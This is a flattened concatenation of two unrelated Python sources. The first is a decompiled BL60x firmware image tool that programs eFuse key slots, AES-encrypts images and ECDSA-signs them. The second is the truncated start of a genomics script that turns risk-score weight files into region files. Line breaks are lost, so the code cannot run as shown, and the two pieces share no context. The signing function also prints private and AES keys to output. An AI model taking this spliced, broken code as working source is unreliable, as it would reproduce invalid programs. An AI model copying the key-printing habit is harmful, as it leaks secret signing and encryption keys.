efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if flash_encryp_type == 2 or (flash_encryp_type == 3): if sec_eng_key_sel == 0: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 1: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 efuse_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_mask_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) efuse_mask_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) fp = 
open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_update_efuse_cpu1(sign, pk_hash, flash_encryp_type, flash_key, sec_eng_key_sel, sec_eng_key): fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') efuse_data[0] |= flash_encryp_type efuse_data[0] |= sign << 2 efuse_mask_data[0] |= 15 rw_lock0 = 0 rw_lock1 = 0 if pk_hash != None: efuse_data[keyslot5:keyslot5 + 16] = pk_hash[0:16] efuse_mask_data[keyslot5:keyslot5 + 16] = mask_4bytes * 4 efuse_data[keyslot6:keyslot7] = pk_hash[16:32] efuse_mask_data[keyslot6:keyslot7] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_5 rw_lock1 |= 1 << wr_lock_key_slot_6 if flash_key != None: efuse_data[keyslot7:keyslot9] = flash_key efuse_mask_data[keyslot7:keyslot9] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_7 rw_lock1 |= 1 << rd_lock_key_slot_8 if sec_eng_key != None: if flash_encryp_type == 0: if sec_eng_key_sel == 0: efuse_data[keyslot8:keyslot9] = sec_eng_key[16:32] efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot10] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 1: efuse_data[keyslot9:keyslot10] = sec_eng_key[16:32] efuse_data[keyslot10:keyslot11] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot11] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << wr_lock_key_slot_10 rw_lock1 |= 1 << rd_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_10 if sec_eng_key_sel == 2: efuse_data[keyslot10:keyslot11] = sec_eng_key[16:32] efuse_data[keyslot11:keyslot12] = sec_eng_key[0:16] efuse_mask_data[keyslot10:keyslot12] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_10 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_10 rw_lock1 |= 1 << rd_lock_key_slot_11 if sec_eng_key_sel == 3: efuse_data[keyslot11:keyslot12] = sec_eng_key[16:32] efuse_data[keyslot8:keyslot9] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot9] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_11 if flash_encryp_type == 1: if sec_eng_key_sel == 0: efuse_data[keyslot8:keyslot9] = sec_eng_key[16:32] efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot10] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 1: efuse_data[keyslot9:keyslot10] = sec_eng_key[16:32] efuse_data[keyslot11:keyslot12] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_11 if sec_eng_key_sel == 2: efuse_data[keyslot11:keyslot12] = sec_eng_key[16:32] efuse_data[keyslot8:keyslot9] = sec_eng_key[0:16] 
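# NOTE (annotation, not part of the decompiled source): img_update_efuse_cpu1 mirrors the sp/cpu0 variants above, but
# it places the two 16-byte halves of sec_eng_key into key slots 8-11 (instead of slots 2-4 and 7), with the exact
# slots chosen by flash_encryp_type and sec_eng_key_sel; each placement also sets the matching wr_lock_*/rd_lock_*
# bits in rw_lock1, presumably so the programmed slots can no longer be read back or rewritten once the eFuses are burned.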
efuse_mask_data[keyslot8:keyslot9] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_11 if sec_eng_key_sel == 3: efuse_data[keyslot8:keyslot9] = sec_eng_key[16:32] efuse_data[keyslot11:keyslot12] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot9] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_11 if flash_encryp_type == 2 or (flash_encryp_type == 3): if sec_eng_key_sel == 0: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 1: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 2: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 3: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 efuse_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_mask_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) efuse_mask_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_create_get_sign_encrypt_info(bootheader_data): sign = bootheader_data[116] & 3 encrypt = bootheader_data[116] >> 2 & 3 key_sel = bootheader_data[116] >> 4 & 3 return ( sign, encrypt, key_sel) def img_create_get_hash_ignore(bootheader_data): return bootheader_data[118] >> 1 & 1 def img_create_get_crc_ignore(bootheader_data): return bootheader_data[118] & 1 def img_create_update_bootheader(bootheader_data, hash, seg_cnt): bootheader_data[120:124] = bflb_utils.int_to_4bytearray_l(seg_cnt) sign, encrypt, key_sel = img_create_get_sign_encrypt_info(bootheader_data) if img_create_get_hash_ignore(bootheader_data) == 1 and sign == 0: bflb_utils.printf('Hash ignored') else: bootheader_data[132:164] = hash if img_create_get_crc_ignore(bootheader_data) == 1: bflb_utils.printf('Header crc ignored') else: hd_crcarray = bflb_utils.get_crc32_bytearray(bootheader_data[0:172]) bootheader_data[172:176] = hd_crcarray bflb_utils.printf('Header crc: ', binascii.hexlify(hd_crcarray).decode('utf-8')) return bootheader_data def img_create_update_segheader(segheader, segdatalen, segdatacrc): segheader[4:8] = segdatalen segheader[8:12] = segdatacrc return segheader def img_create_sha256_data(data_bytearray): hashfun = hashlib.sha256() hashfun.update(data_bytearray) return bflb_utils.hexstr_to_bytearray(hashfun.hexdigest()) def img_create_encrypt_data(data_bytearray, key_bytearray, iv_bytearray, flash_img): if flash_img == 0: cryptor = bflb_aes.AESModeOfOperationCBC(key_bytearray, iv=iv_bytearray) ciphertext = cryptor.encrypt(data_bytearray) else: iv = 
bflb_aes.Counter(initial_value=(int(binascii.hexlify(iv_bytearray), 16))) cryptor = bflb_aes.AESModeOfOperationCTR(key_bytearray, counter=iv) ciphertext = cryptor.encrypt(data_bytearray) return ciphertext def img_create_sign_data(data_bytearray, privatekey_file_uecc, publickey_file): sk = ecdsa.SigningKey.from_pem(open_file(privatekey_file_uecc).read()) vk = ecdsa.VerifyingKey.from_pem(open_file(publickey_file).read()) pk_data = vk.to_string() bflb_utils.printf('Private key: ', binascii.hexlify(sk.to_string())) bflb_utils.printf('Public key: ', binascii.hexlify(pk_data)) pk_hash = img_create_sha256_data(pk_data) bflb_utils.printf('Public key hash=', binascii.hexlify(pk_hash)) signature = sk.sign(data_bytearray, hashfunc=(hashlib.sha256), sigencode=(ecdsa.util.sigencode_string)) bflb_utils.printf('Signature=', binascii.hexlify(signature)) len_array = bflb_utils.int_to_4bytearray_l(len(signature)) sig_field = len_array + signature crcarray = bflb_utils.get_crc32_bytearray(sig_field) return ( pk_data, pk_hash, sig_field + crcarray) def img_create_read_file_append_crc(file, crc): fp = open_file(file, 'rb') read_data = bytearray(fp.read()) crcarray = bytearray(0) if crc: crcarray = bflb_utils.get_crc32_bytearray(read_data) fp.close() return read_data + crcarray def img_creat_process(img_type, flash_img): global encrypt_key encrypt_blk_size = 16 padding = bytearray(encrypt_blk_size) data_tohash = bytearray(0) ret = 'OK' if img_type == 'cpu0': img_update_efuse_fun = img_update_efuse_cpu0 cfg_section = 'Img_CPU0_Cfg' elif img_type == 'cpu1': img_update_efuse_fun = img_update_efuse_cpu1 cfg_section = 'Img_CPU1_Cfg' else: img_update_efuse_fun = img_update_efuse_sp cfg_section = 'Img_Cfg' segheader_file = [] if flash_img == 0: for files in cfg.get(cfg_section, 'segheader_file').split(' '): segheader_file.append(str(files)) segdata_file = [] for files in cfg.get(cfg_section, 'segdata_file').split(' '): segdata_file.append(str(files)) if flash_img == 1: break boot_header_file = cfg.get(cfg_section, 'boot_header_file') bootheader_data = img_create_read_file_append_crc(boot_header_file, 0) encrypt = 0 sign, encrypt, key_sel = img_create_get_sign_encrypt_info(bootheader_data) aesiv_data = bytearray(0) pk_data = bytearray(0) if sign != 0: bflb_utils.printf('Image need sign') publickey_file = cfg.get(cfg_section, 'publickey_file') privatekey_file_uecc = cfg.get(cfg_section, 'privatekey_file_uecc') if encrypt != 0: bflb_utils.printf('Image need encrypt ', encrypt) encrypt_key_org = bflb_utils.hexstr_to_bytearray(cfg.get(cfg_section, 'aes_key_org')) if encrypt == 1: encrypt_key = encrypt_key_org[0:16] elif encrypt == 2: encrypt_key = encrypt_key_org[0:32] elif encrypt == 3: encrypt_key = encrypt_key_org[0:24] bflb_utils.printf('Key= ', binascii.hexlify(encrypt_key)) encrypt_iv = bflb_utils.hexstr_to_bytearray(cfg.get(cfg_section, 'aes_iv')) iv_crcarray = bflb_utils.get_crc32_bytearray(encrypt_iv) aesiv_data = encrypt_iv + iv_crcarray data_tohash = data_tohash + aesiv_data seg_cnt = len(segheader_file) if flash_img == 0: if seg_cnt != len(segdata_file): bflb_utils.printf('Segheader count and segdata count not match') return ( 'FAIL', data_tohash) data_toencrypt = bytearray(0) if flash_img == 0: i = 0 seg_header_list = [] seg_data_list = [] while i < seg_cnt: seg_data = img_create_read_file_append_crc(segdata_file[i], 0) padding_size = 0 if len(seg_data) % encrypt_blk_size != 0: padding_size = encrypt_blk_size - len(seg_data) % encrypt_blk_size seg_data += padding[0:padding_size] else: segdata_crcarray = 
bflb_utils.get_crc32_bytearray(seg_data) seg_data_list.append(seg_data) seg_header = img_create_read_file_append_crc(segheader_file[i], 0) seg_header = img_create_update_segheader(seg_header, bflb_utils.int_to_4bytearray_l(len(seg_data)), segdata_crcarray) segheader_crcarray = bflb_utils.get_crc32_bytearray(seg_header) seg_header = seg_header + segheader_crcarray seg_header_list.append(seg_header) i = i + 1 i = 0 while i < seg_cnt: data_toencrypt += seg_header_list[i] data_toencrypt += seg_data_list[i] i += 1 else: seg_data = img_create_read_file_append_crc(segdata_file[0], 0) padding_size = 0 if len(seg_data) % encrypt_blk_size != 0: padding_size = encrypt_blk_size - len(seg_data) % encrypt_blk_size seg_data += padding[0:padding_size] data_toencrypt += seg_data seg_cnt = len(data_toencrypt) if encrypt != 0: data_toencrypt = img_create_encrypt_data(data_toencrypt, encrypt_key, encrypt_iv, flash_img) fw_data = bytearray(0) data_tohash += data_toencrypt fw_data = data_toencrypt hash = img_create_sha256_data(data_tohash) bflb_utils.printf('Image hash is ', binascii.hexlify(hash).decode('utf-8')) bootheader_data = img_create_update_bootheader(bootheader_data, hash, seg_cnt) signature = bytearray(0) pk_hash = None if sign == 1: pk_data, pk_hash, signature = img_create_sign_data(data_tohash, privatekey_file_uecc, publickey_file) pk_data = pk_data + bflb_utils.get_crc32_bytearray(pk_data) if flash_img == 1: bflb_utils.printf('Write flash img') bootinfo_file_name = cfg.get(cfg_section, 'bootinfo_file') fp = open_file(bootinfo_file_name, 'wb+') bootinfo = bootheader_data + pk_data + pk_data + signature + signature + aesiv_data fp.write(bootinfo) fp.close() fw_file_name = cfg.get(cfg_section, 'img_file') fp = open_file(fw_file_name, 'wb+') fp.write(fw_data) fp.close() if encrypt != 0: if encrypt == 1: img_update_efuse_fun(sign, pk_hash, 1, encrypt_key + bytearray(32 - len(encrypt_key)), key_sel, None) if encrypt == 2: img_update_efuse_fun(sign, pk_hash, 3, encrypt_key + bytearray(32 - len(encrypt_key)), key_sel, None) if encrypt == 3: img_update_efuse_fun(sign, pk_hash, 2, encrypt_key + bytearray(32 - len(encrypt_key)), key_sel, None) else: img_update_efuse_fun(sign, pk_hash, encrypt, None, key_sel, None) else: bflb_utils.printf('Write if img') whole_img_file_name = cfg.get(cfg_section, 'whole_img_file') fp = open_file(whole_img_file_name, 'wb+') img_data = bootheader_data + pk_data + pk_data + signature + signature + aesiv_data + fw_data fp.write(img_data) fp.close() if encrypt != 0: img_update_efuse_fun(sign, pk_hash, 1, None, key_sel, encrypt_key + bytearray(32 - len(encrypt_key))) else: img_update_efuse_fun(sign, pk_hash, 0, None, key_sel, bytearray(32)) return ( 'OK', data_tohash) def bind_if_img(img_dir_path): fp = open_file(cfg.get('Img_CPU0_Cfg', 'whole_img_file'), 'rb') read_data = fp.read() fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'whole_img_file'), 'rb') read_data = read_data + fp.read() fp.close() fp = open_file(img_dir_path + '/wholeimg_cpu0_cpu1_if.bin', 'wb+') fp.write(read_data) fp.close() def usage(): bflb_utils.printf(sys.argv[0], '\n') bflb_utils.printf('-c/--cpu= :CPU type: cpu0 cpu1 or all') bflb_utils.printf('-i/--img_type= :image type:media or if') bflb_utils.printf('-s/--signer= :(the other)signer:cpu0 or cpu1') bflb_utils.printf('-h/--help :helper') def sign_process(data_tohash, file, privatekey_file_uecc, publickey_file, signer): fp = open_file(file, 'rb') header = bytearray(fp.read()) header = header + bytearray(0) fp.close() pk_data, pk_hash, signature_field = 
img_create_sign_data(data_tohash, privatekey_file_uecc, publickey_file) pk_data = pk_data + bflb_utils.get_crc32_bytearray(pk_data) pk_pos = 244 header[pk_pos:pk_pos + 64 + 4] = pk_data sign_pos = 384 header[sign_pos:sign_pos + 4 + 64 + 4] = signature_field fp = open_file(file, 'wb+') fp.write(header) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') if signer == 'cpu0': bflb_utils.printf("CPU0 is signer, add signature for CPU1's image") fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() efuse_data[keyslot0:keyslot2] = pk_hash efuse_mask_data[keyslot0:keyslot2] = mask_4bytes * 8 fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() else: bflb_utils.printf("CPU1 is signer, add signature for CPU0's image") fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() efuse_data[keyslot5:keyslot5 + 16] = pk_hash[0:16] efuse_mask_data[keyslot5:keyslot5 + 16] = mask_4bytes * 4 efuse_data[keyslot6:keyslot7] = pk_hash[16:32] efuse_mask_data[keyslot6:keyslot7] = mask_4bytes * 4 fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_create_do(options, img_dir_path=None, config_file=None): bflb_utils.printf('========= image create =========') bflb_utils.printf('Image create path: ', img_dir_path) if config_file == None: config_file = img_dir_path + '/img_create_cfg.ini' cfg.read(config_file) bflb_utils.printf('Config file: ', config_file) cpu_type = '' signer = 'none' ret0 = 'OK' ret1 = 'OK' data_tohash_cpu0 = bytearray(0) data_tohash_cpu1 = bytearray(0) try: opts, args = getopt.getopt(options, 'c:i:s:Hh', ['cpu=', 'img_type=', 'signer=', 'help']) for option, value in opts: if option in ('-h', '-H'): usage() else: if option in ('-c', '--cpu'): cpu_type = value if option in ('-i', '--img_type'): img_type = value if option in ('-s', '--signer'): signer = value except getopt.GetoptError as err: try: bflb_utils.printf(err) usage() finally: err = None del err if img_type == 'media': flash_img = 1 else: flash_img = 0 if cpu_type == 'cpu0': ret0, data_tohash_cpu0 = img_creat_process('cpu0', flash_img) elif cpu_type == 'cpu1': ret1, data_tohash_cpu1 = img_creat_process('cpu1', flash_img) elif cpu_type == 'all': ret0, data_tohash_cpu0 = img_creat_process('cpu0', flash_img) ret1, data_tohash_cpu1 = img_creat_process('cpu1', flash_img) else: img_creat_process('', flash_img) return if ret0 == 'OK' and ret1 == 'OK': if signer == 'cpu0': bflb_utils.printf('cpu0 sign cpu1 ') if flash_img == 1: sign_process(data_tohash_cpu1, cfg.get('Img_CPU1_Cfg', 'bootinfo_file'), cfg.get('Img_CPU0_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU0_Cfg', 'publickey_file'), 'cpu0') else: sign_process(data_tohash_cpu1, cfg.get('Img_CPU1_Cfg', 'whole_img_file'), cfg.get('Img_CPU0_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU0_Cfg', 'publickey_file'), 'cpu0') elif signer == 'cpu1': bflb_utils.printf('cpu1 sign cpu0 ') if flash_img == 1: 
sign_process(data_tohash_cpu0, cfg.get('Img_CPU0_Cfg', 'bootinfo_file'), cfg.get('Img_CPU1_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU1_Cfg', 'publickey_file'), 'cpu1') else: sign_process(data_tohash_cpu0, cfg.get('Img_CPU0_Cfg', 'whole_img_file'), cfg.get('Img_CPU1_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU1_Cfg', 'publickey_file'), 'cpu1') else: bflb_utils.printf('Fail to create images!') return if cpu_type == 'all': if flash_img == 0: bind_if_img(img_dir_path) def create_sp_media_image(config, cpu_type=None): global cfg bflb_utils.printf('========= sp image create =========') cfg = bflb_utils.BFConfigParser() cfg.read(config) img_creat_process('cpu0', 1) # okay decompiling lib.bl60x.img_create_do.pyc #!/usr/bin/env python #=============================================================================== # Copyright (c) 2019 # Revised from calculate_risk_scores.py from Dr. # Lab of Dr. and Dr. # University of Michigan #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. #============================================================================== ############################ ##### IMPORT MODULES ####### ########################### from __future__ import division import argparse import subprocess import gzip import io import numpy as np from glob import glob import sys from tempfile import NamedTemporaryFile import math from collections import OrderedDict from collections import Counter import os import multiprocessing as mp #import pysam from functools import partial import time import signal import datetime now = datetime.datetime.now() print ("Current date and time : ") print (now.strftime("%Y-%m-%d %H:%M:%S")) print(sys.version) for module in sys.modules: try: print(module,sys.modules[module].__version__) except: pass #This python script can be used to process weights files into region .bed files for tabix # Takes a fairly generalized weights file # - Format your weight file as chr:pos, effect allele, weight OR provide 0-based column numbers for chr, pos, chr:pos, effect allele, weight # - Provide number of lines that have ## or text header to ignore when reading in file ########################### ##### PARSE ARGUMENTS #### ########################### def get_settings(): parser = argparse.ArgumentParser(description='Enter files to use for PRS calculation') parser.add_argument('-w', '--weight_file',help="Must be sorted by position. Columns and headers are customizable with arguments. 
Genome-wide") parser.add_argument("-f",'--chunk_file',default="/net/dumbo/home/larsf/UKB500/VCF/Chunks_250k.txt",help="File with relevant information about chunked VCFs so we can make weight files and region files corresponding to the chunked VCFs. First 3 columns must be chr, start, end.") parser.add_argument("-xc","--prefix_col",help="0-based column with prefix for the chunk from the --chunk_file",default=7) parser.add_argument("-cc","--chrom_col",help="0-based column with chromosome in file",type=int) parser.add_argument("-pc","--pos_col",help="0-based column with end position of variant in weight file",type=int) parser.add_argument("-dc","--coord_col",help="0-based column with chromosome:position:ref:alt of variant in weight file", type=int) parser.add_argument("-ec","--ea_col",help="0-based column with effect allele in weight file",type=int,default=1) parser.add_argument("-rc","--ref_col",help="0-based column with reference allele in weight file",type=int) parser.add_argument("-ac","--alt_col",help="0-based column with alternate allele in weight file",type=int) parser.add_argument("-wc","--weight_col",help="0-based column with weight",type=int,default=2) parser.add_argument("-l","--header_lines",help="Number of header lines in weight file to skip",type=int) parser.add_argument("-n","--num_chunk",help="Number of markers from weight file to run at a time",default=1000,type=int) parser.add_argument('-o', '--output_prefix',type=str,default="results") parser.add_argument("--split",help="split path",type=str,default="/usr/bin/split") args=parser.parse_args() ## check if marker information is adequately provided if args.coord_col is None: #no coordinate offered check_list=[] coordinate_columns=[args.chrom_col,args.pos_col,args.ref_col,args.alt_col] for f in coordinate_columns: check_list.append(f is not None) #count how many of the four coordinate columns were provided if sum(check_list)==0: sys.exit("Need coordinate column for chr:pos:ref:alt or each of these pieces of information individually\n") elif sum(check_list)!=4: sys.exit("Need ALL four columns for chromosome, position, reference, alternate\n") print("%s\n" % args, file=sys.stderr) return args ############################### ######## FUNCTIONS ######### ############################### #open files def open_zip(f): if f is None: print("File was not given as parameter\n", file=sys.stderr) elif ".gz" in f: command=gzip.open(f,"rt") print("Opening gzipped file %s\n" % f, file=sys.stderr) elif f == "-": command=sys.stdin else: command=open(f,"rt") print("Opening file %s\n" % f, file=sys.stderr) return command def read_weights(weight_file,chrom,pos,ref,alt,coord,ea,weight,header_lines): """ Read file with weights into dictionary. 
""" weight_dict=OrderedDict() command=open_zip(weight_file) counter=0 with command as f: for line in f: counter+=1 if (header_lines is not None and counter > header_lines) or (header_lines is None and line[0]!="#"): #handle header ls=line.rstrip() lineList=ls.split() #assumes whitespace delimiter, space or tab if chrom is not None: #because of argument check function we can trust this means we are making our own coordinate with chrom, pos, ref, alt coordinate=":".join([str(lineList[chrom]),str(lineList[pos]),str(lineList[ref]),str(lineList[alt])]) weight_dict[coordinate]=lineList elif coord is not None: if len(lineList[coord].split(":"))!=4: sys.exit("Coordinate must have 4 components chr:pos:ref:alt\n") weight_dict[lineList[coord]]=(lineList[ea],float(lineList[weight])) else: #earlier checks mean we should never hit this sys.exit("Error1\n") return weight_dict def read_chunks(chunk_file,prefix_col): """Read in chunk file""" chunk_list=[] command=open_zip(chunk_file) with command as f: for line in f: ls=line.rstrip() if ls[0].isdigit(): #assumes we ignore header lines not starting with a digit, also ignores sex chrom lineList=ls.split() #assumes whitespace delimiter, space or tab chunk_list.append(":".join([lineList[0],lineList[1],lineList[2],lineList[prefix_col]])) #chr:start:end:prefix return(chunk_list) def make_regions(weight_dict,chunk_list,output_prefix,num_chunk): """ Make a region files using weights and known chunks """ total=len(weight_dict.keys()) print(weight_dict.keys()) if total==0: sys.stderr.write("Weights file is empty\n") sys.exit() #open config file config="_".join([output_prefix,"config.txt"]) cfile=open(config,'w+') for j in range(len(chunk_list)): mega_chunk=chunk_list[j] chunk_chrom,chunk_start,chunk_end,prefix=mega_chunk.split(":") vcf="".join(["/net/dumbo/home/larsf/UKB500/VCF/ukb24460_imp_",prefix,"_v3_s486743.vcf.gz"]) #need to generalize mini_chunk_counter=0 region="_".join([output_prefix,prefix,".".join([str(mini_chunk_counter),"regions.txt"])]) #new region weight="_".join([output_prefix,prefix,".".join([str(mini_chunk_counter),"weights.txt"])]) #new weight cfile.write("\t".join([region,weight,vcf,chunk_chrom])+"\n") #write in config rfile=open(region,'w') wfile=open(weight,'w') marker_counter=0 for entry in list(weight_dict.keys()): #ordered dictionary; copy the keys so entries can be deleted while iterating print(marker_counter) print(mini_chunk_counter) print(entry,chunk_chrom,chunk_start,chunk_end) chrom,pos,a1,a2=entry.split(":") if int(chrom)==int(chunk_chrom) and int(pos)>=int(chunk_start) and int(pos)<=int(chunk_end): #still in mega chunk rfile.write("\t".join([chrom,pos]) + "\n") wfile.write("\t".join(weight_dict[entry]) + "\n") print("Write %s" % entry) del weight_dict[entry] #delete from dictionary marker_counter+=1 if marker_counter==num_chunk+1: #end of a mini chunk, start new region and write files within the same mega_chunk rfile.close() wfile.close() marker_counter=0 mini_chunk_counter+=1 break elif (int(chrom)!=int(chunk_chrom) or int(pos) > int(chunk_end)) or marker_counter==total: #end of mega chunk print("%s not in %s" % (entry,mega_chunk)) j+=1 break cfile.close() clean_up(config) return 0 def clean_up(config): print("Clean up directory\n") keep=[] command=open_zip(config) with command as f: for line in f: ls=line.rstrip() lineList=ls.split() if os.stat(lineList[0]).st_size==0 or os.stat(lineList[1]).st_size==0: os.remove(lineList[0]) os.remove(lineList[1]) else: keep.append(line) f.close() os.remove(config) cfile=open(config,'w+') print("Writing new config\n") for entry in keep: 
